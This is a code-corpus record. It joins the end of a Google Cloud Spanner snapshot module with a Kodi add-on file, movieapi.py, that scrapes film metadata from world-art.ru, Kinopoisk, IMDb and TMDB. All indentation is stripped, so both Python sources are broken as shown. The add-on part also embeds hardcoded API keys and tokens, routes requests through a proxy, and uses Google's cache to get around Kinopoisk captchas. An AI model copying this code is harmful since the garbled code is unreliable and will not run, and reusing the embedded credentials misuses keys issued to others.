for reuse of single-use snapshots, or if a transaction ID is
already pending for multiple-use snapshots.
"""
if self._read_request_count > 0:
if not self._multi_use:
raise ValueError("Cannot re-use single-use snapshot.")
if self._transaction_id is None:
raise ValueError("Transaction ID pending.")
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
transaction = self._make_txn_selector()
restart = functools.partial(
api.streaming_read,
self._session.name, table, columns, keyset._to_pb(),
transaction=transaction, index=index, limit=limit,
partition_token=partition, metadata=metadata)
iterator = _restart_on_unavailable(restart)
self._read_request_count += 1
if self._multi_use:
return StreamedResultSet(iterator, source=self)
else:
return StreamedResultSet(iterator)
def execute_sql(self, sql, params=None, param_types=None,
query_mode=None, partition=None):
"""Perform an ``ExecuteStreamingSql`` API request.
:type sql: str
:param sql: SQL query statement
:type params: dict, {str -> column value}
:param params: values for parameter replacement. Keys must match
the names used in ``sql``.
:type param_types: dict[str -> Union[dict, .types.Type]]
:param param_types:
(Optional) maps explicit types for one or more param values;
required if parameters are passed.
:type query_mode:
:class:`google.cloud.spanner_v1.proto.ExecuteSqlRequest.QueryMode`
:param query_mode: Mode governing return of results / query plan. See
https://cloud.google.com/spanner/reference/rpc/google.spanner.v1#google.spanner.v1.ExecuteSqlRequest.QueryMode1
:type partition: bytes
:param partition: (Optional) one of the partition tokens returned
from :meth:`partition_query`.
:rtype: :class:`~google.cloud.spanner_v1.streamed.StreamedResultSet`
:returns: a result set instance which can be used to consume rows.
:raises ValueError:
for reuse of single-use snapshots, or if a transaction ID is
already pending for multiple-use snapshots.
"""
if self._read_request_count > 0:
if not self._multi_use:
raise ValueError("Cannot re-use single-use snapshot.")
if self._transaction_id is None:
raise ValueError("Transaction ID pending.")
if params is not None:
if param_types is None:
raise ValueError(
"Specify 'param_types' when passing 'params'.")
params_pb = Struct(fields={
key: _make_value_pb(value) for key, value in params.items()})
else:
params_pb = None
database = self._session._database
metadata = _metadata_with_prefix(database.name)
transaction = self._make_txn_selector()
api = database.spanner_api
restart = functools.partial(
api.execute_streaming_sql,
self._session.name, sql,
transaction=transaction, params=params_pb, param_types=param_types,
query_mode=query_mode, partition_token=partition,
metadata=metadata)
iterator = _restart_on_unavailable(restart)
self._read_request_count += 1
if self._multi_use:
return StreamedResultSet(iterator, source=self)
else:
return StreamedResultSet(iterator)
def partition_read(self, table, columns, keyset, index='',
partition_size_bytes=None, max_partitions=None):
"""Perform a ``ParitionRead`` API request for rows in a table.
:type table: str
:param table: name of the table from which to fetch data
:type columns: list of str
:param columns: names of columns to be retrieved
:type keyset: :class:`~google.cloud.spanner_v1.keyset.KeySet`
:param keyset: keys / ranges identifying rows to be retrieved
:type index: str
:param index: (Optional) name of index to use, rather than the
table's primary key
:type partition_size_bytes: int
:param partition_size_bytes:
(Optional) desired size for each partition generated. The service
uses this as a hint, the actual partition size may differ.
:type max_partitions: int
:param max_partitions:
(Optional) desired maximum number of partitions generated. The
service uses this as a hint, the actual number of partitions may
differ.
:rtype: iterable of bytes
:returns: a sequence of partition tokens
:raises ValueError:
for single-use snapshots, or if a transaction ID is
already associtated with the snapshot.
"""
if not self._multi_use:
raise ValueError("Cannot use single-use snapshot.")
if self._transaction_id is None:
raise ValueError("Transaction not started.")
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
transaction = self._make_txn_selector()
partition_options = PartitionOptions(
partition_size_bytes=partition_size_bytes,
max_partitions=max_partitions,
)
response = api.partition_read(
session=self._session.name,
table=table,
columns=columns,
key_set=keyset._to_pb(),
transaction=transaction,
index=index,
partition_options=partition_options,
metadata=metadata,
)
return [partition.partition_token for partition in response.partitions]
def partition_query(self, sql, params=None, param_types=None,
partition_size_bytes=None, max_partitions=None):
"""Perform a ``ParitionQuery`` API request.
:type sql: str
:param sql: SQL query statement
:type params: dict, {str -> column value}
:param params: values for parameter replacement. Keys must match
the names used in ``sql``.
:type param_types: dict[str -> Union[dict, .types.Type]]
:param param_types:
(Optional) maps explicit types for one or more param values;
required if parameters are passed.
:type partition_size_bytes: int
:param partition_size_bytes:
(Optional) desired size for each partition generated. The service
uses this as a hint, the actual partition size may differ.
:type max_partitions: int
:param max_partitions:
(Optional) desired maximum number of partitions generated. The
service uses this as a hint, the actual number of partitions may
differ.
:rtype: iterable of bytes
:returns: a sequence of partition tokens
:raises ValueError:
for single-use snapshots, or if a transaction ID is
already associtated with the snapshot.
"""
if not self._multi_use:
raise ValueError("Cannot use single-use snapshot.")
if self._transaction_id is None:
raise ValueError("Transaction not started.")
if params is not None:
if param_types is None:
raise ValueError(
"Specify 'param_types' when passing 'params'.")
params_pb = Struct(fields={
key: _make_value_pb(value) for key, value in params.items()})
else:
params_pb = None
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
transaction = self._make_txn_selector()
partition_options = PartitionOptions(
partition_size_bytes=partition_size_bytes,
max_partitions=max_partitions,
)
response = api.partition_query(
session=self._session.name,
sql=sql,
transaction=transaction,
params=params_pb,
param_types=param_types,
partition_options=partition_options,
metadata=metadata,
)
return [partition.partition_token for partition in response.partitions]
class Snapshot(_SnapshotBase):
"""Allow a set of reads / SQL statements with shared staleness.
See
https://cloud.google.com/spanner/reference/rpc/google.spanner.v1#google.spanner.v1.TransactionOptions.ReadOnly
If no options are passed, reads will use the ``strong`` model, reading
at a timestamp where all previously committed transactions are visible.
:type session: :class:`~google.cloud.spanner_v1.session.Session`
:param session: the session used to perform the commit.
:type read_timestamp: :class:`datetime.datetime`
:param read_timestamp: Execute all reads at the given timestamp.
:type min_read_timestamp: :class:`datetime.datetime`
:param min_read_timestamp: Execute all reads at a
timestamp >= ``min_read_timestamp``.
:type max_staleness: :class:`datetime.timedelta`
:param max_staleness: Read data at a
timestamp >= NOW - ``max_staleness`` seconds.
:type exact_staleness: :class:`datetime.timedelta`
:param exact_staleness: Execute all reads at a timestamp that is
``exact_staleness`` old.
:type multi_use: :class:`bool`
:param multi_use: If true, multipl :meth:`read` / :meth:`execute_sql`
calls can be performed with the snapshot in the
context of a read-only transaction, used to ensure
isolation / consistency. Incompatible with
``max_staleness`` and ``min_read_timestamp``.
"""
def __init__(self, session, read_timestamp=None, min_read_timestamp=None,
max_staleness=None, exact_staleness=None, multi_use=False):
super(Snapshot, self).__init__(session)
opts = [
read_timestamp, min_read_timestamp, max_staleness, exact_staleness]
flagged = [opt for opt in opts if opt is not None]
if len(flagged) > 1:
raise ValueError("Supply zero or one options.")
if multi_use:
if min_read_timestamp is not None or max_staleness is not None:
raise ValueError(
"'multi_use' is incompatible with "
"'min_read_timestamp' / 'max_staleness'")
self._strong = len(flagged) == 0
self._read_timestamp = read_timestamp
self._min_read_timestamp = min_read_timestamp
self._max_staleness = max_staleness
self._exact_staleness = exact_staleness
self._multi_use = multi_use
def _make_txn_selector(self):
"""Helper for :meth:`read`."""
if self._transaction_id is not None:
return TransactionSelector(id=self._transaction_id)
if self._read_timestamp:
key = 'read_timestamp'
value = _datetime_to_pb_timestamp(self._read_timestamp)
elif self._min_read_timestamp:
key = 'min_read_timestamp'
value = _datetime_to_pb_timestamp(self._min_read_timestamp)
elif self._max_staleness:
key = 'max_staleness'
value = _timedelta_to_duration_pb(self._max_staleness)
elif self._exact_staleness:
key = 'exact_staleness'
value = _timedelta_to_duration_pb(self._exact_staleness)
else:
key = 'strong'
value = True
options = TransactionOptions(
read_only=TransactionOptions.ReadOnly(**{key: value}))
if self._multi_use:
return TransactionSelector(begin=options)
else:
return TransactionSelector(single_use=options)
def begin(self):
"""Begin a read-only transaction on the database.
:rtype: bytes
:returns: the ID for the newly-begun transaction.
:raises ValueError:
if the transaction is already begun, committed, or rolled back.
"""
if not self._multi_use:
raise ValueError("Cannot call 'begin' on single-use snapshots")
if self._transaction_id is not None:
raise ValueError("Read-only transaction already begun")
if self._read_request_count > 0:
raise ValueError("Read-only transaction already pending")
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
txn_selector = self._make_txn_selector()
response = api.begin_transaction(
self._session.name, txn_selector.begin, metadata=metadata)
self._transaction_id = response.id
return self._transaction_id
| apache-2.0 | 5,522,960,487,971,635,000 | 36.964989 | 123 | 0.620288 | false |
vadyur/script.media.aggregator | movieapi.py | 1 | 34003 | # -*- coding: utf-8 -*-
import log
from log import debug, print_tb
import json, re, base, filesystem
import urllib2, requests
from bs4 import BeautifulSoup
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100'
def copy_files(src, dst, pattern):
from backgrounds import safe_copyfile
for ext in ['.strm', '.nfo', '.strm.alternative']:
src_file = filesystem.join(src, base.make_fullpath(pattern, ext))
if filesystem.exists(src_file):
dst_file = filesystem.join(dst, base.make_fullpath(pattern, ext))
safe_copyfile(src_file, dst_file)
def make_imdb_path(path, imdb):
if imdb and imdb.startswith('tt'):
return filesystem.join(path, 'TTx' + imdb[3:5], imdb)
return path
def write_movie(fulltitle, link, settings, parser, path, skip_nfo_exists=False, download_torrent=True):
debug('+-------------------------------------------')
filename = parser.make_filename()
if filename:
debug('fulltitle: ' + fulltitle.encode('utf-8'))
debug('filename: ' + filename.encode('utf-8'))
debug('-------------------------------------------+')
imdb = parser.get_value('imdb_id')
new_path = make_imdb_path(path, imdb)
if new_path != path:
copy_files(path, new_path, filename)
with filesystem.save_make_chdir_context(new_path, 'movieaip.write_movie'):
from strmwriter import STRMWriter
STRMWriter(parser.link()).write(filename, new_path,
parser=parser,
settings=settings)
from nfowriter import NFOWriter
NFOWriter(parser, movie_api = parser.movie_api()).write_movie(filename, new_path, skip_nfo_exists=skip_nfo_exists)
if download_torrent:
from downloader import TorrentDownloader
TorrentDownloader(parser.link(), settings.torrents_path(), settings).download()
settings.update_paths.add(new_path)
return filesystem.relpath( filesystem.join(new_path, base.make_fullpath(filename, '.strm')), start=settings.base_path())
def get_tmdb_api_key():
key = 'f090bb54758cabf231fb605d3e3e0468'
host = 'api.tmdb.org'
import filesystem
try:
import xbmc
home_path = xbmc.translatePath('special://home').decode('utf-8')
major = xbmc.getInfoLabel("System.BuildVersion").split(".")[0]
if int(major) > 17:
return {'host': host, 'key': key }
except ImportError:
# cur = filesystem.dirname(__file__)
# home_path = filesystem.join(cur, '../..')
return {'host': host, 'key': key }
try:
xml_path = filesystem.join(home_path, 'addons', 'metadata.common.themoviedb.org', 'tmdb.xml')
with filesystem.fopen(xml_path, 'r') as xml:
content = xml.read()
match = re.search(r'api_key=(\w+)', content)
if match:
key = match.group(1)
debug('get_tmdb_api_key: ok')
m = re.search(r'://(.+)/3/', content)
if m:
host = m.group(1)
except BaseException as e:
debug('get_tmdb_api_key: ' + str(e))
return {'host': host, 'key': key }
def attr_text(s):
return s.get_text()
def attr_split_slash(s):
itms = s.get_text().split('/')
return [i.strip() for i in itms]
def attr_year(s):
import re
m = re.search(r'(\d\d\d\d)', s.get_text())
if m:
return m.group(1)
def attr_genre(s):
return [ a.get_text() for a in s.find_all('a') ]
class IDs(object):
kp_by_imdb = {}
imdb_by_kp = {}
@staticmethod
def id_by_kp_url(url):
import re
m = re.search(r"(\d\d+)", url)
if m:
return m.group(1)
return None
@staticmethod
def get_by_kp(kp_url):
return IDs.imdb_by_kp.get(IDs.id_by_kp_url(kp_url))
@staticmethod
def get_by_imdb(imdb_id):
return IDs.kp_by_imdb.get(imdb_id)
@staticmethod
def set(imdb_id, kp_url):
if imdb_id and kp_url:
kp_id = IDs.id_by_kp_url(kp_url)
IDs.imdb_by_kp[kp_id] = imdb_id
IDs.kp_by_imdb[imdb_id] = kp_id
@staticmethod
def has_imdb(imdb_id):
return imdb_id in IDs.kp_by_imdb
@staticmethod
def has_kp(kp_url):
kp_id = IDs.id_by_kp_url(kp_url)
return kp_id in IDs.imdb_by_kp
from soup_base import soup_base
class world_art_soup(soup_base):
headers = {
'Host': 'www.world-art.ru',
'Upgrade-Insecure-Requests': '1',
'User-Agent': user_agent,
'X-Compress': 'null',
}
def __init__(self, url):
soup_base.__init__(self, url, self.headers)
class world_art_actors(world_art_soup):
def __init__(self, url):
world_art_soup.__init__(self, url)
self._actors = []
@property
def actors(self):
if not self._actors:
def append_actor(tr):
tds = tr.find_all('td', recursive=False)
a = tds[1].find('a')
act = {}
if a:
id = a['href'].split('?id=')[-1]
id = id.split('&')[0]
#if td.find('img', attrs={'src': "../img/photo.gif"}):
# act['photo'] = 'http://www.world-art.ru/img/people/10000/{}.jpg'.format(int(id))
act['ru_name'] = tds[1].get_text()
act['en_name'] = tds[2].get_text()
act['role'] = tds[3].get_text()
#act = { k:v for k, v in act.iteritems() if v } ## No python 2.6 compatible
res = {}
for k, v in act.iteritems():
if v:
res[k] = v
self._actors.append(res)
for b in self.soup.find_all('b'):
if b.get_text() == u'Актёры':
table = b.find_parent('table')
table = table.find_next_siblings('table')[1]
for tr_next in table.find_all('tr'):
append_actor(tr_next)
'''
tr = b.find_parent('tr')
if tr:
for tr_next in tr.find_next_siblings('tr'):
append_actor(tr_next)
'''
return self._actors
def __getitem__(self, i):
if isinstance(i, int):
return self.actors[i]
elif isinstance(i, str) or isinstance(i, unicode):
for act in self.actors:
if act['ru_name'] == i:
return act
if act['en_name'] == i:
return act
raise KeyError
class world_art_info(world_art_soup):
Request_URL = "http://www.world-art.ru/%s"
attrs = [
(u'Названия', 'knowns', attr_split_slash),
(u'Производство', 'country', attr_text),
(u'Хронометраж', 'runtime', attr_text),
(u'Жанр', 'genre', attr_genre),
(u'Первый показ', 'year', attr_year),
(u'Режиссёр', 'director', attr_text),
]
def __init__(self, url):
world_art_soup.__init__(self, self.Request_URL % url)
self._info_data = dict()
self._actors = None
@property
def actors(self):
if not self._actors:
self._actors = world_art_actors(self.url.replace('cinema.php', 'cinema_full_cast.php'))
return self._actors.actors
@property
def data(self):
def next_td(td, fn):
return fn(td.next_sibling.next_sibling)
if not self._info_data:
data = {}
for td in self.soup.find_all('td', class_='review'):
td_text = td.get_text()
find = [item for item in self.attrs if td_text in item]
if find:
item = find[0]
data[item[1]] = next_td(td, item[2])
self._info_data = data.copy()
return self._info_data
def __getattr__(self, name):
names = [i[1] for i in self.attrs]
if name in names:
return self.data[name]
raise AttributeError
@property
def imdb(self):
a = self.soup.select('a[href*=imdb.com]')
if a:
for part in a[0]['href'].split('/'):
if part.startswith('tt'):
return part
@property
def kp_url(self):
a = self.soup.select('a[href*=kinopoisk.ru]')
return a[0]['href']
@property
def plot(self):
p = self.soup.find('p', attrs ={'class':'review', 'align': 'justify'})
if p:
return p.get_text()
class world_art(world_art_soup):
Request_URL = "http://www.world-art.ru/search.php?public_search=%s&global_sector=cinema"
def __init__(self, title, year=None, imdbid=None, kp_url=None):
import urllib
url = self.Request_URL % urllib.quote_plus(title.encode('cp1251'))
world_art_soup.__init__(self, url)
self._title = title
self._year = year
self._imdbid = imdbid
self._kp_url = kp_url
self._info = None
@property
def info(self):
if not self._info:
results = self.search_by_title(self._title)
#filter by year
if self._year:
results = [ item for item in results if item.year == self._year ]
if self._imdbid:
results = [ item for item in results if item.imdb == self._imdbid ]
if results:
self._info = results[0]
return self._info
if self._kp_url:
results = [ item for item in results if IDs.id_by_kp_url(item.kp_url) == IDs.id_by_kp_url(self._kp_url) ]
if results:
self._info = results[0]
return self._info
# filter by title
for item in results:
if self._title in item.knowns:
self._info = item
return self._info
self._info = 'No info'
#for info in results:
# imdb = info.imdb
if self._info == 'No info':
raise AttributeError
return self._info
def search_by_title(self, title):
result = []
for meta in self.soup.find_all('meta'):
# meta <meta content="0; url=/cinema/cinema.php?id=68477" http-equiv="Refresh"/> Tag
if meta.get('http-equiv') == "Refresh" and 'url=/cinema/cinema.php?id=' in meta.get('content'):
url = meta.get('content').split('url=/')[-1]
info = world_art_info(url)
info.year = self._year
#info.knowns = [ self._title ]
result.append( info )
for a in self.soup.find_all('a', class_="estimation"):
info = world_art_info(a['href'])
tr = a
while tr.name != 'tr':
tr = tr.parent
info.year = tr.find('td').get_text()
td = a.parent
info.knowns = [ i.get_text() for i in td.find_all('i') ]
result.append( info )
return result
def plot(self):
return self.info.plot
#def trailer(self):
# info = self.info
def director(self):
try:
result = self.info.director
result = result.replace(u'и другие', '')
return [d.strip() for d in result.split(',')]
except:
return []
def actors(self):
try:
return self.info.actors
except:
return []
class tmdb_movie_item(object):
def __init__(self, json_data, type='movie'):
self.json_data_ = json_data
self.type = type
def poster(self):
try:
return 'http://image.tmdb.org/t/p/w500' + self.json_data_['poster_path']
except BaseException:
return ''
def fanart(self):
try:
return 'http://image.tmdb.org/t/p/original' + self.json_data_['backdrop_path']
except BaseException:
return ''
def get_art(self):
art = {}
path = self.poster()
art['thumb'] = path
art['poster'] = path
art['thumbnailImage'] = path
art['fanart'] = self.fanart()
return art
def get_info(self):
info = {}
if 'genres' in self.json_data_:
info['genre'] = u', '.join([i['name'] for i in self.json_data_['genres']])
analogy = {
'aired': 'release_date',
'plot': 'overview',
'title': 'name',
'originaltitle': 'originalname',
}
for tag in analogy:
if analogy[tag] in self.json_data_:
info[tag] = self.json_data_[analogy[tag]]
if 'aired' in info:
aired = info['aired']
m = re.search('(\d\d\d\d)', aired)
if m:
info['year'] = int(m.group(1))
try:
vid_item = self.json_data_['videos']['results'][0]
if vid_item['site'] == 'YouTube':
info['trailer'] = 'plugin://plugin.video.youtube/?action=play_video&videoid=' + vid_item['key']
except BaseException:
pass
string_items = ['director', 'mpaa', 'title', 'originaltitle', 'duration', 'studio', 'code', 'album', 'votes', 'thumb']
for item in string_items:
if item in self.json_data_:
info[item] = self.json_data_[item]
# 'credits',
return info
def imdb(self):
try:
if 'imdb_id' in self.json_data_:
return self.json_data_['imdb_id']
elif 'external_ids' in self.json_data_ and 'imdb_id' in self.json_data_['external_ids']:
return self.json_data_['external_ids']['imdb_id']
except BaseException:
return None
def tmdb_id(self):
if 'id' in self.json_data_:
return self.json_data_['id']
else:
return None
class Object(object):
pass
class KinopoiskAPI(object):
# Common session for KP requests
session = None
kp_requests = []
@staticmethod
def make_url_by_id(kp_id):
return 'http://www.kinopoisk.ru/film/' + str(kp_id) + '/'
def __init__(self, kinopoisk_url = None, settings = None):
from settings import Settings
self.settings = settings if settings else Settings('')
self.kinopoisk_url = kinopoisk_url
self.soup = None
self._actors = None
def _http_get(self, url):
for resp in KinopoiskAPI.kp_requests:
if resp['url'] == url:
return resp['response']
r = requests.Response()
if self.session is None:
self.session = requests.session()
try:
if self.settings.kp_googlecache:
r = self.get_google_cache(url)
else:
proxy = 'socks5h://socks.zaborona.help:1488'
proxies = { 'http': proxy, 'https': proxy } if self.settings.kp_usezaborona else None
headers = {'user-agent': user_agent}
r = self.session.get(url, headers=headers, proxies=proxies, timeout=5.0)
except requests.exceptions.ConnectionError as ce:
r = requests.Response()
r.status_code = requests.codes.service_unavailable
debug(str(ce))
except requests.exceptions.Timeout as te:
r = requests.Response()
r.status_code = requests.codes.request_timeout
debug(str(te))
if not self.settings.kp_googlecache:
if 'captcha' in r.text:
r = self.get_google_cache(url)
KinopoiskAPI.kp_requests.append({'url': url, 'response': r})
return r
def get_google_cache(self, url):
import urllib
search_url = "http://www.google.com/search?q=" + urllib.quote_plus(url)
headers = {'user-agent': user_agent}
r = self.session.get(search_url, headers=headers, timeout=2.0)
try:
soup = BeautifulSoup(base.clean_html(r.text), 'html.parser')
a = soup.find('a', class_='fl')
if a:
cache_url = a['href']
import urlparse
res = urlparse.urlparse(cache_url)
res = urlparse.ParseResult(res.scheme if res.scheme else 'https',
res.netloc if res.netloc else 'webcache.googleusercontent.com',
res.path, res.params, res.query, res.fragment)
cache_url = urlparse.urlunparse(res)
#print cache_url
r = self.session.get(cache_url, headers=headers, timeout=2.0)
indx = r.text.find('<html')
resp = Object()
resp.status_code = r.status_code
resp.text = r.text[indx:]
return resp
except BaseException as e:
debug(str(e))
return requests.Response()
def makeSoup(self):
if self.kinopoisk_url and self.soup is None:
r = self._http_get(self.kinopoisk_url)
if r.status_code == requests.codes.ok:
text = base.clean_html(r.content)
self.soup = BeautifulSoup(text, 'html.parser')
else:
pass
def title(self):
title = None
self.makeSoup()
if self.soup:
s = self.soup.find('span', class_='moviename-title-wrapper')
if s:
title = s.get_text().strip('\t\r\n ')
return title
def originaltitle(self):
title = None
self.makeSoup()
if self.soup:
span = self.soup.find('span', attrs = {'itemprop': 'alternativeHeadline'})
if span:
title = span.get_text().strip('\t\r\n ')
return title
def year(self):
self.makeSoup()
if self.soup:
for a in self.soup.find_all('a'):
if '/lists/m_act%5Byear%5D/' in a.get('href', ''):
return a.get_text()
raise AttributeError
def director(self):
self.makeSoup()
if self.soup:
#<td itemprop="director"><a href="/name/535852/" data-popup-info="enabled">Роар Утхауг</a></td>
td = self.soup.find('td', attrs={"itemprop": "director"})
if td:
return [ a.get_text() for a in td.find_all('a') if '/name' in a['href'] ]
raise AttributeError
def plot(self):
plot = None
self.makeSoup()
if self.soup:
div = self.soup.find('div', attrs={"itemprop": "description"})
if div:
plot = div.get_text().replace(u'\xa0', u' ')
return plot
raise AttributeError
def base_actors_list(self):
actors = []
self.makeSoup()
if self.soup:
for li in self.soup.find_all('li', attrs={'itemprop': 'actors'}):
a = li.find('a')
if a:
actors.append(a.get_text())
if '...' in actors:
actors.remove('...')
if actors:
return ', '.join(actors)
else:
return ''
def actors(self):
if self._actors is not None:
return self._actors
self._actors = []
if self.kinopoisk_url:
cast_url = self.kinopoisk_url + 'cast/'
r = self._http_get(cast_url)
if r.status_code == requests.codes.ok:
text = base.clean_html(r.text)
soup = BeautifulSoup(text, 'html.parser')
if not soup:
return []
for actorInfo in soup.find_all('div', class_='actorInfo'):
photo = actorInfo.select('div.photo a')[0]['href']
#http://st.kp.yandex.net/images/actor_iphone/iphone360_30098.jpg
#/name/7627/
photo = photo.replace('/', '').replace('name', '')
photo = 'http://st.kp.yandex.net/images/actor_iphone/iphone360_' + photo + '.jpg'
ru_name = actorInfo.select('div.info .name a')[0].get_text()
en_name = actorInfo.select('div.info .name span')[0].get_text()
role = actorInfo.select('div.info .role')[0].get_text().replace('... ', '')
role = role.split(',')[0]
self._actors.append({'photo': photo,'ru_name': ru_name,'en_name': en_name,'role': role})
return self._actors
def __trailer(self, element):
for parent in element.parents:
#debug(parent.tag)
if parent.name == 'tr':
for tr in parent.next_siblings:
if not hasattr(tr, 'select'):
continue
if tr.name != 'tr':
continue
for a_cont in tr.select('a.continue'):
if u'Высокое качество' in a_cont.get_text():
trailer = a_cont['href']
trailer = re.search('link=(.+?)$', trailer).group(1)
try:
debug('trailer: ' + trailer)
except:
pass
return trailer
return None
def trailer(self):
if self.kinopoisk_url:
trailer_page = self.kinopoisk_url + 'video/type/1/'
r = self._http_get(trailer_page)
if r.status_code == requests.codes.ok:
text = base.clean_html(r.text)
soup = BeautifulSoup(text, 'html.parser')
if not soup:
return None
for div in soup.select('tr td div div.flag2'):
trailer = self.__trailer(div)
if trailer:
return trailer
for a in soup.select('a.all'):
return self.__trailer(a)
return None
def poster(self):
raise AttributeError
class imdb_cast(soup_base):
def __init__(self, url):
soup_base(self, url + '/fullcredits')
self._actors = []
@property
def actors(self):
if not self._actors:
tbl = self.soup.find('table', class_='cast_list')
if tbl:
for tr in tbl.find('tr'):
if 'class' in tr:
act = {}
# https://images-na.ssl-images-amazon.com/images/M/MV5BMTkxMzk2MDkwOV5BMl5BanBnXkFtZTcwMDAxODQwMg@@._V1_UX32_CR0,0,32,44_AL_.jpg
# https://images-na.ssl-images-amazon.com/images/M/MV5BMjExNzA4MDYxN15BMl5BanBnXkFtZTcwOTI1MDAxOQ@@._V1_SY1000_CR0,0,721,1000_AL_.jpg
# https://images-na.ssl-images-amazon.com/images/M/MV5BMjExNzA4MDYxN15BMl5BanBnXkFtZTcwOTI1MDAxOQ@@._V1_UY317_CR7,0,214,317_AL_.jpg
#img = tr.find('img')
class ImdbAPI(object):
def __init__(self, imdb_id):
headers = { 'Accept-Language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' }
resp = requests.get('http://www.imdb.com/title/' + imdb_id + '/', headers=headers)
if resp.status_code == requests.codes.ok:
text = base.clean_html(resp.content)
self.page = BeautifulSoup(text, 'html.parser')
def year(self):
a = self.page.select_one('#titleYear > a')
if a:
return a.get_text()
else:
raise AttributeError
def rating(self):
span = self.page.find('span', attrs={'itemprop':'ratingValue'})
if span:
return span.get_text().replace(',', '.')
else:
raise AttributeError
def runtime(self):
t = self.page.find('time', attrs={'itemprop':'duration'})
if t:
return t['datetime'].replace('PT', '').replace('M', '')
else:
raise AttributeError
def mpaa(self):
rt = self.page.find('meta', attrs={'itemprop':'contentRating'})
if rt:
return 'Rated ' + rt['content']
else:
raise AttributeError
def title(self):
# <h1 itemprop="name" class="">
h1 = self.page.find('h1', attrs={'itemprop':'name'})
if h1:
return unicode( h1.contents[0] ).replace(u'\xa0', u' ').strip()
else:
raise AttributeError
def originaltitle(self):
import re
meta = self.page.find('meta', attrs={'property': 'og:title'})
if meta:
otitle = meta['content']
otitle = re.sub(r'\(\d+\)', '', otitle)
otitle = otitle.split('(TV')[0]
return otitle.strip()
raise AttributeError
def type(self):
# <div class="bp_heading">Episode Guide</div>
for div in self.page.find_all('div', class_="bp_heading"):
if div.get_text() == 'Episode Guide':
return 'tvshow'
return 'movie'
class KinopoiskAPI2(KinopoiskAPI):
movie_cc = {}
token = '037313259a17be837be3bd04a51bf678'
def __init__(self, kinopoisk_url = None, settings = None):
if kinopoisk_url:
self.kp_id = IDs.id_by_kp_url(kinopoisk_url)
return super(KinopoiskAPI2, self).__init__(kinopoisk_url, settings)
else:
self.kp_id = None
@property
def data_cc(self):
if self.kp_id is None:
return {}
if self.kp_id in self.movie_cc:
return self.movie_cc[self.kp_id]
url = 'http://getmovie.cc/api/kinopoisk.json?id=%s&token=%s' % (self.kp_id, self.token)
r = requests.get(url)
if r.status_code == requests.codes.ok:
self.movie_cc[self.kp_id] = r.json()
return self.movie_cc[self.kp_id]
return {}
def title(self):
return self.data_cc.get('name_ru')
def originaltitle(self):
return self.data_cc.get('name_en')
def year(self):
return self.data_cc.get('year')
def plot(self):
return self.data_cc.get('description') #.replace('<br/>', '<br/>')
def actors(self):
if self._actors is not None:
return self._actors
self._actors = []
creators = self.data_cc.get('creators')
if creators:
for actor in creators.get('actor', []):
self._actors.append({'photo': actor.get("photos_person"),
'ru_name': actor.get("name_person_ru"),'en_name': actor.get("name_person_en")})
return self._actors
def trailer(self):
return self.data_cc.get('trailer')
def poster(self):
return 'https://st.kp.yandex.net/images/film_big/{}.jpg'.format(self.kp_id)
class TMDB_API(object):
api_url = 'https://api.themoviedb.org/3'
tmdb_api_key = get_tmdb_api_key()
@staticmethod
def url_imdb_id(idmb_id):
url = 'http://%s/3/find/%s?api_key=%s&language=ru&external_source=imdb_id' % (TMDB_API.tmdb_api_key['host'], idmb_id, TMDB_API.tmdb_api_key['key'])
tmdb_data = json.load(urllib2.urlopen( url ))
for type in ['movie', 'tv']:
try:
id = tmdb_data['%s_results' % type][0]['id']
return 'http://%s/3/' % TMDB_API.tmdb_api_key['host'] + type + '/' + str(id) + '?api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru&append_to_response=credits'
except: pass
return None
@staticmethod
def search(title):
url = 'http://%s/3/search/movie?query=' % TMDB_API.tmdb_api_key['host'] + urllib2.quote(title.encode('utf-8')) + '&api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru'
movies = TMDB_API.tmdb_query(url)
url = 'http://%s/3/search/tv?query=' % TMDB_API.tmdb_api_key['host'] + urllib2.quote(title.encode('utf-8')) + '&api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru'
tv = TMDB_API.tmdb_query(url, 'tv')
return movies + tv
@staticmethod
def tmdb_query(url, type='movie'):
class tmdb_query_result(object):
def __init__(self):
self.result = []
self.total_pages = None
def append(self, item):
self.result.append(item)
def __iter__(self):
for x in self.result:
yield x
def __add__(self, other):
r = tmdb_query_result()
r.result = self.result + other.result
return r
def __len__(self):
return len(self.result)
def __getitem__(self, index):
return self.result[index]
result = tmdb_query_result()
try:
debug('Request is: ' + url)
data = json.load(urllib2.urlopen(url))
debug(u'data is: ' + unicode(data))
except urllib2.HTTPError as e:
debug('Error TMDB request')
debug(e)
return tmdb_query_result()
if "total_pages" in data:
result.total_pages = data["total_pages"]
for tag in ['results', 'movie_results', 'tv_results']:
if tag in data:
for r in data[tag]:
if not r['overview']:
continue
if '_results' in tag:
type = tag.replace('_results', '')
url2 = 'http://%s/3/' % TMDB_API.tmdb_api_key['host'] + type + '/' + str(
r['id']) + '?api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru&append_to_response=credits,videos,external_ids'
data2 = json.load(urllib2.urlopen(url2))
if 'imdb_id' in data2:
result.append(tmdb_movie_item(data2, type))
elif 'external_ids' in data2 and 'imdb_id' in data2['external_ids']:
result.append(tmdb_movie_item(data2, type))
return result
@staticmethod
def tmdb_by_imdb(imdb, type):
url = 'http://%s/3/find/' % TMDB_API.tmdb_api_key['host'] + imdb + '?external_source=imdb_id&api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&append_to_response=credits,videos,external_ids'
debug(url)
return TMDB_API.tmdb_query(url, type)
@staticmethod
def popular(page=1):
url = 'http://%s/3/movie/popular?api_key=' % TMDB_API.tmdb_api_key['host'] + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
return TMDB_API.tmdb_query(url)
@staticmethod
def popular_tv(page=1):
url = 'http://%s/3/tv/popular?api_key=' % TMDB_API.tmdb_api_key['host'] + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
return TMDB_API.tmdb_query(url, 'tv')
@staticmethod
def top_rated(page=1):
